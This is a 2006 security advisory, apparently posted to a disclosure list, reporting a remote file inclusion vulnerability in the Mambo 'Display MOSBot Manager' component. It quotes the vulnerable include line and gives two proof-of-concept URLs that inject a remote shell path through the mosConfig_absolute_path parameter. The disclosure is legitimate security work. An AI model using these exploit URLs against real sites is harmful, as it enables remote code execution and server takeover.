Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [SA21543] mail f/w system Mail Header Injection Vulnerability [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection [SA21584] Empire CMS "check_path" File Inclusion Vulnerability From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net> Date:21.08.2006Subject:Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln ################################################################## ######################### # Aria-Security.net Advisory # # Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > # # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp # # # ################################################################## ######################### #Software: Mambo Component - Display MOSBot Manager #Attack method: Remote File Inclusion #Source: #include_once( "".$mosConfig_absolute_path."/administrator/components/". $component_directory ."/toolbar.". ********************************************************************************* *** #Proof of Concept: #http://www.site.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfi g_absolute_path=shell #http://www.site.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_ absolute_path=shell #---------------------------------------------------------- # # #Contact : Outlaw@aria-security.net
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[SA21543] mail f/w system Mail Header Injection Vulnerability
[SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities
[SA21603] Drupal Easylinks Module Script Insertion and SQL Injection
[SA21584] Empire CMS "check_path" File Inclusion Vulnerability
